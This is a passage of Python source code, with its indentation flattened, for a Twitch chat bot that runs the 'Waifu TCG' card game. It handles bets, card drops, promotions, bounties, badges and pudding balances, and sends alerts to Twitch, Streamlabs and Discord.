curg.execute("SELECT boostername, de_amount, reward_booster FROM pack_amount_rewards")
rewardRows = curg.fetchall()
for row in rewardRows:
if row[0] not in packAmountRewards:
packAmountRewards[row[0]] = {}
packAmountRewards[row[0]][int(row[1])] = row[2]
def checkAndRenewAppAccessToken():
global config, headers
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"]}
r = requests.get("https://api.twitch.tv/kraken", headers=krakenHeaders)
resp = r.json()
if "identified" not in resp or not resp["identified"]:
# app access token has expired, get a new one
logger.debug("Requesting new token")
url = 'https://id.twitch.tv/oauth2/token?client_id=%s&client_secret=%s&grant_type=client_credentials' % (
config["clientID"], twitchclientsecret)
r = requests.post(url)
try:
jsondata = r.json()
if 'access_token' not in jsondata or 'expires_in' not in jsondata:
raise ValueError("Invalid Twitch API response, can't get an app access token.")
config["appAccessToken"] = jsondata['access_token']
logger.debug("request done")
cur = db.cursor()
cur.execute("UPDATE config SET value = %s WHERE name = 'appAccessToken'", [jsondata['access_token']])
cur.close()
headers = {"Authorization": "Bearer %s" % config["appAccessToken"]}
except ValueError as error:
logger.error("Access Token renew/get request was not successful")
raise error
def booleanConfig(name):
return name in config and config[name].strip().lower() not in ["off", "no", "false"]
def placeBet(channel, userid, betms):
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return False
cur.execute("REPLACE INTO placed_bets (betid, userid, bet, updated) VALUE (%s, %s, %s, %s)",
[row[0], userid, betms, current_milli_time()])
cur.close()
return True
def endBet(channel):
# find started bet data
cur = db.cursor()
cur.execute("SELECT id FROM bets WHERE channel = %s AND status = 'started' LIMIT 1", [channel])
row = cur.fetchone()
if row is None:
cur.close()
return None
# mark the bet as closed
endTime = current_milli_time()
cur.execute("UPDATE bets SET status = 'completed', endTime = %s WHERE id = %s", [endTime, row[0]])
# calculate preliminary results
cur.close()
return getBetResults(row[0])
def getBetResults(betid):
# get bet data
cur = db.cursor()
cur.execute("SELECT status, startTime, endTime FROM bets WHERE id = %s", [betid])
betrow = cur.fetchone()
if betrow is None:
cur.close()
return None
if betrow[0] != 'completed' and betrow[0] != 'paid':
cur.close()
return None
timeresult = betrow[2] - betrow[1]
cur.execute(
"SELECT bet, userid, users.name FROM placed_bets INNER JOIN users ON placed_bets.userid = users.id WHERE betid = %s ORDER BY updated ASC",
[betid])
rows = cur.fetchall()
placements = sorted(rows, key=lambda row: abs(int(row[0]) - timeresult))
actualwinners = [{"id": row[1], "name": row[2], "bet": row[0], "timedelta": row[0] - timeresult} for row in
placements]
cur.close()
return {"result": timeresult, "winners": actualwinners}
class NotEnoughBetsException(Exception):
pass
class NoBetException(Exception):
pass
class NotOpenLongEnoughException(Exception):
pass
def startBet(channel, confirmed=False):
with db.cursor() as cur:
cur.execute("SELECT id, openedTime FROM bets WHERE channel = %s AND status = 'open' LIMIT 1", [channel])
row = cur.fetchone()
if row is not None:
if not confirmed:
cur.execute("SELECT COUNT(*) FROM placed_bets WHERE betid = %s", [row[0]])
if cur.fetchone()[0] < int(config["betMinimumEntriesForPayout"]):
raise NotEnoughBetsException()
if row[1] is not None and int(row[1]) + int(config["betMinimumMinutesOpen"])*60000 > current_milli_time():
raise NotOpenLongEnoughException()
cur.execute("UPDATE bets SET startTime = %s, status = 'started' WHERE id = %s", [current_milli_time(), row[0]])
else:
raise NoBetException()
def openBet(channel):
cur = db.cursor()
cur.execute("SELECT COUNT(*) FROM bets WHERE channel = %s AND status IN('open', 'started')", [channel])
result = cur.fetchone()[0] or 0
if result > 0:
cur.close()
return False
else:
cur.execute("INSERT INTO bets(channel, status, openedTime) VALUES (%s, 'open', %s)", [channel, current_milli_time()])
cur.close()
return True
def cancelBet(channel):
cur = db.cursor()
affected = cur.execute("UPDATE bets SET status = 'cancelled' WHERE channel = %s AND status IN('open', 'started')",
[channel])
cur.close()
return affected > 0
def getHand(twitchid):
try:
tID = int(twitchid)
except Exception:
logger.error("Got non-integer id for getHand. Aborting.")
return []
cur = db.cursor()
cur.execute(
"SELECT amount, waifus.name, waifus.id, rarity, series, image, base_rarity, custom_image FROM has_waifu JOIN waifus ON has_waifu.waifuid = waifus.id WHERE has_waifu.userid = %s ORDER BY (rarity < %s) DESC, waifus.id ASC",
[tID, int(config["numNormalRarities"])])
rows = cur.fetchall()
cur.close()
return [{"name": row[1], "amount": row[0], "id": row[2], "rarity": row[3], "series": row[4], "image": row[7] or row[5],
"base_rarity": row[6]} for row in rows]
def search(query, series=None):
cur = db.cursor()
if series is None:
cur.execute("SELECT id, Name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND Name LIKE %s",
["%" + query + "%"])
else:
cur.execute(
"SELECT id, Name, series, base_rarity FROM waifus WHERE can_lookup = 1 AND Name LIKE %s AND series LIKE %s",
["%" + query + "%", "%" + series + "%"])
rows = cur.fetchall()
ret = []
for row in rows:
ret.append({'id': row[0], 'name': row[1], 'series': row[2], 'base_rarity': row[3]})
return ret
def handLimit(userid):
with db.cursor() as cur:
cur.execute("SELECT 7 + paidHandUpgrades + freeUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
return limit
def paidHandUpgrades(userid):
cur = db.cursor()
cur.execute("SELECT paidHandUpgrades FROM users WHERE id = %s", [userid])
res = cur.fetchone()
limit = int(res[0])
cur.close()
return limit
def currentCards(userid, verbose=False):
cur = db.cursor()
cur.execute(
"SELECT (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND rarity < %s), (SELECT COUNT(*) FROM bounties WHERE userid = %s AND status = 'open')",
[userid, int(config["numNormalRarities"]), userid])
result = cur.fetchone()
cur.close()
if verbose:
return {"hand": result[0], "bounties": result[1], "total": result[0] + result[1]}
else:
return result[0] + result[1]
def upgradeHand(userid, gifted=False):
cur = db.cursor()
cur.execute(
"UPDATE users SET paidHandUpgrades = paidHandUpgrades + %s, freeUpgrades = freeUpgrades + %s WHERE id = %s",
[0 if gifted else 1, 1 if gifted else 0, userid])
cur.close()
def attemptBountyFill(bot, waifuid):
# return profit from the bounty
with db.cursor() as cur:
cur.execute(
"SELECT bounties.id, bounties.userid, users.name, bounties.amount, waifus.name, waifus.base_rarity FROM bounties JOIN users ON bounties.userid = users.id JOIN waifus ON bounties.waifuid = waifus.id WHERE bounties.waifuid = %s AND bounties.status = 'open' ORDER BY bounties.amount DESC LIMIT 1",
[waifuid])
order = cur.fetchone()
if order is not None:
# fill their order instead of actually disenchanting
giveCard(order[1], waifuid, order[5])
bot.message('#%s' % order[2],
"Your bounty for [%d] %s for %d points has been filled and they have been added to your hand." % (
waifuid, order[4], order[3]), True)
cur.execute("UPDATE bounties SET status = 'filled', updated = %s WHERE id = %s",
[current_milli_time(), order[0]])
# alert people with lower bounties but above the cap?
base_value = int(config["rarity" + str(order[5]) + "Value"])
min_bounty = int(config["rarity" + str(order[5]) + "MinBounty"])
rarity_cap = int(config["rarity" + str(order[5]) + "MaxBounty"])
cur.execute(
"SELECT users.name FROM bounties JOIN users ON bounties.userid = users.id WHERE bounties.waifuid = %s AND bounties.status = 'open' AND bounties.amount > %s",
[waifuid, rarity_cap])
for userrow in cur.fetchall():
bot.message('#%s' % userrow[0],
"A higher bounty for [%d] %s than yours was filled, so you can now cancel yours and get full points back provided you don't change it." % (
waifuid, order[4]), True)
# give the disenchanter appropriate profit
# everything up to the min bounty, 1/2 of any amount between the min and max bounties, 1/4 of anything above the max bounty.
return (min_bounty - base_value) + max(min(order[3] - min_bounty, rarity_cap - min_bounty) // 2, 0) + max((order[3] - rarity_cap) // 4, 0)
else:
# no bounty
return 0
def setFavourite(userid, waifu):
with db.cursor() as cur:
cur.execute("UPDATE users SET favourite=%s WHERE id = %s", [waifu, userid])
def setDescription(userid, newDesc):
with db.cursor() as cur:
cur.execute("UPDATE users SET profileDescription=%s WHERE id = %s", [newDesc, userid])
def checkFavouriteValidity(userid):
with db.cursor() as cur:
cur.execute("SELECT favourite FROM users WHERE id = %s", [userid])
favourite = getWaifuById(cur.fetchone()[0])
valid = True
if favourite["can_favourite"] == 0:
valid = False
elif favourite["base_rarity"] >= int(config["numNormalRarities"]):
# must be owned
cur.execute("SELECT COUNT(*) FROM has_waifu WHERE waifuid = %s AND userid = %s", [favourite["id"], userid])
valid = cur.fetchone()[0] > 0
if not valid:
# reset favourite
cur.execute("UPDATE users SET favourite = 1 WHERE id = %s", [userid])
def getBadgeByID(id):
logger.debug("Getting badge for id %s", id)
try:
id = int(id)
if id < 1 or id > maxBadgeID():
logger.debug("ID was smaller than 1 or bigger than max.")
return None
except ValueError:
logger.debug("ValueError, not an int")
return None
cur = db.cursor()
cur.execute("SELECT id, name, description, image FROM badges WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[3], "description": row[2]}
cur.close()
logger.debug("Fetched Badge from id: %s", ret)
return ret
def addBadge(name, description, image):
"""Adds a new Badge to the database"""
with db.cursor() as cur:
cur.execute("INSERT INTO badges(name, description, image) VALUES(%s, %s, %s)", [name, description, image])
return cur.lastrowid
def giveBadge(userid, badge):
"""Gives a user a badge"""
badgeObj = getBadgeByID(badge)
if badgeObj is None:
return False
else:
try:
with db.cursor() as cur:
cur.execute("INSERT INTO has_badges(userID, badgeID) VALUES(%s, %s)", [userid, badge])
except:
logger.debug("Had an error.")
return False
return True
def getHoraro():
r = requests.get(
"https://horaro.org/-/api/v1/schedules/{horaroid}/ticker".format(horaroid=config["horaroID"]))
try:
j = r.json()
# ("got horaro ticker: " + str(j))
return j
except Exception:
logger.error("Horaro Error:")
logger.error(str(r.status_code))
logger.error(r.text)
def getRawRunner(runner):
if '[' not in runner:
return runner
return runner[runner.index('[') + 1 : runner.index(']')]
def updateBoth(game, title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title), "game": str(game)}}
logger.debug(str(body))
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
logger.debug("Response from twitch: "+str(j))
# print("tried to update channel title, response: " + str(j))
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateTitle(title):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"status": str(title)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def updateGame(game):
if not booleanConfig("marathonBotFunctions"):
return
myheaders = headers.copy()
myheaders["Authorization"] = "OAuth " + config["marathonOAuth"].replace("oauth:", "")
myheaders["Content-Type"] = "application/json"
myheaders["Accept"] = "application/vnd.twitchtv.v5+json"
body = {"channel": {"game": str(game)}}
r = requests.put("https://api.twitch.tv/kraken/channels/"+config["marathonChannelID"], headers=myheaders, json=body)
try:
j = r.json()
except Exception:
logger.error(str(r.status_code))
logger.error(r.text)
def sendStreamlabsAlert(channel, data):
if '#' in channel:
channel = channel[1:]
with busyLock:
with db.cursor() as cur:
cur.execute("SELECT alertkey FROM channels WHERE name = %s LIMIT 1", [channel])
tokenRow = cur.fetchone()
if tokenRow is not None and tokenRow[0] is not None:
data['access_token'] = tokenRow[0]
with streamlabsLock:
try:
req = requests.post(streamlabsalerturl, headers=alertheaders, json=data)
if req.status_code != 200:
logger.debug("response for streamlabs alert: %s; %s", str(req.status_code), str(req.text))
except Exception:
logger.error("Tried to send a Streamlabs alert to %s, but failed." % channel)
logger.error("Error: %s", str(sys.exc_info()))
def sendDiscordAlert(data):
with discordLock:
for url in discordhooks:
req2 = requests.post(
url,
json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
url,
json=data)
def sendAdminDiscordAlert(data):
with discordLock:
req2 = requests.post(config["adminDiscordHook"], json=data)
while req2.status_code == 429:
time.sleep((int(req2.headers["Retry-After"]) / 1000) + 1)
req2 = requests.post(
config["adminDiscordHook"],
json=data)
def sendDrawAlert(channel, waifu, user, discord=True):
logger.info("Alerting for waifu %s", str(waifu))
with busyLock:
cur = db.cursor()
# check for first time drop
first_time = "pulls" in waifu and waifu['pulls'] == 0
message = "*{user}* drew {first_time}[*{rarity}*] {name}!".format(user=str(user),
rarity=str(config["rarity" + str(
waifu["base_rarity"]) + "Name"]),
name=str(waifu["name"]),
first_time=(
"the first ever " if first_time else ""))
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
colorInt = int(config[colorKey])
# Convert RGB int to RGB values
blue = colorInt & 255
green = (colorInt >> 8) & 255
red = (colorInt >> 16) & 255
alertconfig = {}
for row in rows:
alertconfig[row[0]] = row[1]
keys = alertconfig.keys()
alertChannel = "donation" if "alertChannel" not in keys else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in keys else alertconfig["defaultSound"]
alertSound = defaultSound if str("rarity" + str(waifu["base_rarity"]) + "Sound") not in keys else alertconfig[
str("rarity" + str(waifu["base_rarity"]) + "Sound")]
defaultLength = config["alertDuration"] if "defaultLength" not in keys else alertconfig["defaultLength"]
alertLength = defaultLength if str("rarity" + str(waifu["base_rarity"]) + "Length") not in keys else \
alertconfig[str("rarity" + str(waifu["base_rarity"]) + "Length")]
alertColor = "default" if "color" not in keys else alertconfig["color"]
if "id" in waifu:
cur.execute("SELECT sound, length FROM waifuAlerts WHERE waifuid=%s", [waifu["id"]])
rows = cur.fetchall()
if len(rows) == 1:
alertLength = int(rows[0][1])
alertSound = str(rows[0][0])
alertbody = {"type": alertChannel, "image_href": waifu["image"],
"sound_href": alertSound, "duration": int(alertLength), "message": message}
if alertColor == "rarity":
alertbody["special_text_color"] = "rgb({r}, {g}, {b})".format(r=str(red), g=str(green), b=str(blue))
cur.close()
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
if discord:
# check for first time drop
rarityName = str(config["rarity" + str(waifu["base_rarity"]) + "Name"])
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A{n} {rarity} waifu has been dropped{first_time}!".format(
rarity=rarityName,
first_time=(" for the first time" if first_time else ""),
n='n' if rarityName[0] in ('a', 'e', 'i', 'o', 'u') else '')
},
{
"type": "rich",
"title": "{user} dropped {name}!".format(user=str(user), name=str(waifu["name"])),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendDisenchantAlert(channel, waifu, user):
# no streamlabs alert for now
# todo maybe make a b&w copy of the waifu image
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A {rarity} waifu has been disenchanted!".format(
rarity=str(config["rarity" + str(waifu["base_rarity"]) + "Name"]))
},
{
"type": "rich",
"title": "{name} has been disenchanted! Press F to pay respects.".format(name=str(waifu["name"])),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": str(waifu["image"])
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
colorKey = "rarity" + str(waifu["base_rarity"]) + "EmbedColor"
if colorKey in config:
discordbody["embeds"][0]["color"] = int(config[colorKey])
discordbody["embeds"][1]["color"] = int(config[colorKey])
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def sendPromotionAlert(userid, waifuid, new_rarity):
with busyLock:
# check for duplicate alert and don't send it
# UNLESS this is a promotion to MAX rarity
if new_rarity != int(config["numNormalRarities"]) - 1:
with db.cursor() as cur:
cur.execute(
"SELECT COUNT(*) FROM promotion_alerts_sent WHERE userid = %s AND waifuid = %s AND rarity >= %s",
[userid, waifuid, new_rarity])
result = cur.fetchone()[0]
if result > 0:
return
# get data necessary for the alert and note that we sent it
# TODO maybe use display name instead
waifu = getWaifuById(waifuid)
with db.cursor() as cur:
cur.execute("SELECT name FROM users WHERE id = %s", [userid])
username = cur.fetchone()[0]
cur.execute("REPLACE INTO promotion_alerts_sent (userid, waifuid, rarity) VALUES(%s, %s, %s)",
[userid, waifuid, new_rarity])
# compile alert
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A waifu has been promoted!",
"color": int(config["rarity%dEmbedColor" % new_rarity])
},
{
"type": "rich",
"title": "{user} promoted {name} to {rarity} rarity!".format(user=username, name=waifu["name"],
rarity=config[
"rarity%dName" % new_rarity]),
"color": int(config["rarity%dEmbedColor" % new_rarity]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"image": {
"url": waifu["image"]
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def naturalJoinNames(names):
if len(names) == 1:
return names[0]
return ", ".join(names[:-1]) + " and " + names[-1]
def getWaifuRepresentationString(waifuid, baserarity=None, cardrarity=None, waifuname=None):
if baserarity == None or cardrarity == None or waifuname == None:
waifuData = getWaifuById(waifuid)
if baserarity == None:
baserarity = waifuData['base_rarity']
if cardrarity == None:
cardrarity = baserarity
if waifuname == None:
waifuname = waifuData['name']
promoteDiff = cardrarity - baserarity
promoteStars = (" (" + ("★" * (promoteDiff)) + ")") if promoteDiff > 0 else ""
retStr = "[%d][%s%s] %s" % (
waifuid, config["rarity" + str(cardrarity) + "Name"], promoteStars, waifuname)
return retStr
def sendSetAlert(channel, user, name, waifus, pudding, discord=True):
logger.info("Alerting for set claim %s", name)
with busyLock:
with db.cursor() as cur:
chanOwner = str(channel).replace("#", "")
cur.execute("SELECT config, val FROM alertConfig WHERE channelName = %s", [chanOwner])
rows = cur.fetchall()
alertconfig = {row[0]: row[1] for row in rows}
alertChannel = "donation" if "alertChannel" not in alertconfig else alertconfig["alertChannel"]
defaultSound = config["alertSound"] if "defaultSound" not in alertconfig else alertconfig["defaultSound"]
alertSound = defaultSound if "setClaimSound" not in alertconfig else alertconfig["setClaimSound"]
defaultLength = config["alertDuration"] if "defaultLength" not in alertconfig else alertconfig["defaultLength"]
alertLength = defaultLength if "setClaimLength" not in alertconfig else alertconfig["setClaimLength"]
message = "{user} claimed the set {name}!".format(user=user, name=name)
alertbody = {"type": alertChannel, "sound_href": alertSound, "duration": int(alertLength), "message": message}
threading.Thread(target=sendStreamlabsAlert, args=(channel, alertbody)).start()
discordbody = {"username": "Waifu TCG", "embeds": [
{
"title": "A set has been completed!",
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"])
},
{
"type": "rich",
"title": "{user} completed the set {name}!".format(user=str(user), name=name),
"description": "They gathered {waifus} and received {pudding} pudding as their reward.".format(waifus=naturalJoinNames(waifus), pudding=str(pudding)),
"url": "https://twitch.tv/{name}".format(name=str(channel).replace("#", "").lower()),
"color": int(config["rarity" + str(int(config["numNormalRarities"]) - 1) + "EmbedColor"]),
"footer": {
"text": "Waifu TCG by Marenthyu"
},
"provider": {
"name": "Marenthyu",
"url": "https://marenthyu.de"
}
}
]}
if discord:
threading.Thread(target=sendDiscordAlert, args=(discordbody,)).start()
def followsme(userid):
try:
krakenHeaders = {"Authorization": "OAuth %s" % config["appAccessToken"],
"Accept": "application/vnd.twitchtv.v5+json"}
r = requests.get(
"https://api.twitch.tv/kraken/users/{twitchid}/follows/channels/{myid}".format(twitchid=str(userid),
myid=str(
config["twitchid"])),
headers=krakenHeaders)
j = r.json()
return "channel" in j and "_id" in j["channel"] and int(config["twitchid"]) == int(j["channel"]["_id"])
except Exception:
return False
def getWaifuById(id):
try:
id = int(id)
if id < 1 or id > maxWaifuID():
return None
except ValueError:
return None
cur = db.cursor()
cur.execute("SELECT id, Name, image, base_rarity, series, can_lookup, pulls, last_pull, can_favourite, can_purchase FROM waifus WHERE id=%s",
[id])
row = cur.fetchone()
ret = {"id": row[0], "name": row[1], "image": row[2], "base_rarity": row[3], "series": row[4], "can_lookup": row[5],
"pulls": row[6], "last_pull": row[7], "can_favourite": row[8], "can_purchase": row[9]}
cur.close()
# print("Fetched Waifu from id: " + str(ret))
return ret
def getWaifuOwners(id, rarity):
with db.cursor() as cur:
baseRarityName = config["rarity%dName" % rarity]
cur.execute(
"SELECT users.name, has_waifu.rarity, has_waifu.amount FROM has_waifu JOIN users ON has_waifu.userid = users.id WHERE has_waifu.waifuid = %s ORDER BY has_waifu.rarity DESC, has_waifu.amount DESC, users.name ASC",
[id])
allOwners = cur.fetchall()
# compile per-owner data
ownerData = OrderedDict()
ownedByOwner = {}
for row in allOwners:
if row[0] not in ownerData:
ownerData[row[0]] = []
ownedByOwner[row[0]] = 0
rarityName = config["rarity%dName" % row[1]]
ownerData[row[0]].append(rarityName if row[2] == 1 else "%d %s" % (row[2], rarityName))
ownedByOwner[row[0]] += row[2]
ownerDescriptions = []
for owner in ownerData:
if len(ownerData[owner]) != 1 or baseRarityName not in ownerData[owner] or ownedByOwner[owner] > 1:
# verbose
ownerDescriptions.append(owner + " (" + ", ".join(ownerData[owner]) + ")")
else:
ownerDescriptions.append(owner)
return ownerDescriptions
def hasPoints(userid, amount):
cur = db.cursor()
cur.execute("SELECT points FROM users WHERE id = %s", [userid])
ret = int(cur.fetchone()[0]) >= int(amount)
cur.close()
return ret
def addPoints(userid, amount):
cur = db.cursor()
cur.execute("UPDATE users SET points = points + %s WHERE id = %s", [amount, userid])
cur.close()
def getPuddingBalance(userid):
with db.cursor() as cur:
cur.execute("SELECT puddingCurrent, puddingPrevious, puddingExpiring FROM users WHERE id = %s", [userid])
pinfo = cur.fetchone()
return None if pinfo is None else [int(n) for n in pinfo]
def hasPudding(userid, amount):
bal = getPuddingBalance(userid)
return bal is not None and sum(bal) >= amount
def addPudding(userid, amount):
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = puddingCurrent + %s WHERE id = %s", [amount, userid])
def takePudding(userid, amount):
pinfo = getPuddingBalance(userid)
if pinfo is None or sum(pinfo) < amount:
raise ValueError()
# take from the pudding starting from the expiring amount first
idx = 2
while amount > 0:
new_val = max(pinfo[idx] - amount, 0)
amount -= pinfo[idx] - new_val
pinfo[idx] = new_val
idx -= 1
# save the updated values
with db.cursor() as cur:
cur.execute("UPDATE users SET puddingCurrent = %s, puddingPrevious = %s, puddingExpiring = %s WHERE id = %s", pinfo + [userid])
def maxWaifuID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM waifus")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def maxBadgeID():
cur = db.cursor()
cur.execute("SELECT MAX(id) FROM badges")
ret = int(cur.fetchone()[0])
cur.close()
return ret
def getUniqueCards(userid):
with db.cursor() as cur:
uniqueRarities = [rarity for rarity in range(int(config["numNormalRarities"])) if
int(config["rarity%dMax" % rarity]) == 1]
if len(uniqueRarities) == 0:
return []
else:
inStr = ",".join(["%s"] * len(uniqueRarities))
cur.execute("SELECT waifuid FROM has_waifu WHERE userid = %s AND rarity IN ({0})".format(inStr),
[userid] + uniqueRarities)
rows = cur.fetchall()
return [row[0] for row in rows]
def dropCard(rarity=-1, upgradeChances=None, useEventWeightings=False, allowDowngrades=True, bannedCards=None):
random.seed()
if rarity == -1:
maxrarity = int(config["numNormalRarities"]) - 1
if upgradeChances is None:
upgradeChances = [float(config["rarity%dUpgradeChance" % i]) for i in range(maxrarity)]
else:
assert len(upgradeChances) == maxrarity
rarity = 0
while (rarity < maxrarity):
if random.random() < upgradeChances[rarity]:
rarity += 1
else:
break
return dropCard(rarity=rarity, useEventWeightings=useEventWeightings, allowDowngrades=allowDowngrades,
bannedCards=bannedCards)
else:
with db.cursor() as cur:
if bannedCards is not None and len(bannedCards) > 0:
banClause = " AND id NOT IN(" + ",".join(["%s"] * len(bannedCards)) + ")"
else:
banClause = ""
bannedCards = []
raritymax = int(config["rarity" + str(rarity) + "Max"])
weighting_column = "(event_weighting*normal_weighting)" if useEventWeightings else "normal_weighting"
result = None
if raritymax > 0:
if rarity >= int(config["strongerWeightingMinRarity"]):
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} AND (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = waifus.id) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = waifus.id AND boosters_opened.status = 'open') < %s AND {0} >= 1 ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards + [raritymax])
result = cur.fetchone()
if result is None:
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} AND (SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = waifus.id) + (SELECT COUNT(*) FROM boosters_cards JOIN boosters_opened ON boosters_cards.boosterid=boosters_opened.id WHERE boosters_cards.waifuid = waifus.id AND boosters_opened.status = 'open') < %s ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards + [raritymax])
result = cur.fetchone()
else:
cur.execute(
"SELECT id FROM waifus WHERE base_rarity = %s{1} ORDER BY -LOG(1-RAND())/{0} LIMIT 1".format(
weighting_column, banClause), [rarity] + bannedCards)
result = cur.fetchone()
if result is None:
# no waifus left at this rarity
logger.info("No droppable waifus left at rarity %d" % rarity)
if allowDowngrades:
return dropCard(rarity=rarity - 1, useEventWeightings=useEventWeightings, bannedCards=bannedCards)
else:
return None
else:
return result[0]
def recordPullMetrics(*cards):
with db.cursor() as cur:
inString = ",".join(["%s"] * len(cards))
pullTime = current_milli_time()
cur.execute(
"UPDATE waifus SET normal_weighting = normal_weighting / %s, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting <= 1".format(
inString), [float(config["weighting_increase_amount"])**4, pullTime] + list(cards))
cur.execute(
"UPDATE waifus SET normal_weighting = 1, pulls = pulls + 1, last_pull = %s WHERE id IN({0}) AND normal_weighting > 1".format(
inString), [pullTime] + list(cards))
def giveCard(userid, id, rarity, amount=1):
with db.cursor() as cur:
cur.execute("SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
currentAmount = cur.fetchone()[0]
if currentAmount != 0:
cur.execute("UPDATE has_waifu SET amount = amount + %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[amount, userid, id, rarity])
else:
cur.execute("INSERT INTO has_waifu(userid, waifuid, rarity, amount) VALUES(%s, %s, %s, %s)",
[userid, id, rarity, amount])
def attemptPromotions(*cards):
promosDone = {}
with db.cursor() as cur:
for waifuid in cards:
while True:
usersThisCycle = []
cur.execute(
"SELECT userid, rarity, amount FROM has_waifu JOIN waifus ON has_waifu.waifuid = waifus.id WHERE has_waifu.waifuid = %s AND has_waifu.amount > 1 AND waifus.can_promote = 1 ORDER BY has_waifu.rarity ASC, RAND() ASC",
[waifuid])
candidates = cur.fetchall()
for row in candidates:
if row[0] in usersThisCycle:
continue
userid = row[0]
rarity = row[1]
amount = row[2]
if rarity < int(config["numNormalRarities"]) - 1 and amount >= int(
config["rarity%dPromoteAmount" % rarity]):
promoteAmount = int(config["rarity%dPromoteAmount" % rarity])
amountToMake = amount // promoteAmount
# limit check?
newRarityLimit = int(config["rarity%dMax" % (rarity + 1)])
if newRarityLimit != 0:
cur.execute(
"SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE waifuid = %s AND rarity >= %s",
[waifuid, rarity + 1])
currentOwned = cur.fetchone()[0]
amountToMake = max(min(amountToMake, newRarityLimit - currentOwned), 0)
if amountToMake != 0:
usersThisCycle.append(userid)
leftAtCurrentRarity = amount - (amountToMake * promoteAmount)
# fix quantity of current rarity
if leftAtCurrentRarity == 0:
cur.execute("DELETE FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, waifuid, rarity])
else:
cur.execute(
"UPDATE has_waifu SET amount = %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[leftAtCurrentRarity, userid, waifuid, rarity])
# give card(s) at promoted rarity
giveCard(userid, waifuid, rarity + 1, amountToMake)
# update promosDone
if userid not in promosDone:
promosDone[userid] = {}
if waifuid not in promosDone[userid] or promosDone[userid][waifuid] < rarity + 1:
promosDone[userid][waifuid] = rarity + 1
if len(usersThisCycle) == 0:
# nothing changed, we're done
break
# promo alerts
for user in promosDone:
for waifu in promosDone[user]:
if promosDone[user][waifu] >= int(config["promotionAlertMinimumRarity"]):
threading.Thread(target=sendPromotionAlert, args=(user, waifu, promosDone[user][waifu])).start()
def takeCard(userid, id, rarity, amount=1):
with db.cursor() as cur:
cur.execute("SELECT COALESCE(SUM(amount), 0) FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
currentAmount = cur.fetchone()[0]
if currentAmount > amount:
cur.execute("UPDATE has_waifu SET amount = amount - %s WHERE userid = %s AND waifuid = %s AND rarity = %s",
[amount, userid, id, rarity])
elif currentAmount == amount:
cur.execute("DELETE FROM has_waifu WHERE userid = %s AND waifuid = %s AND rarity = %s",
[userid, id, rarity])
else:
raise ValueError(
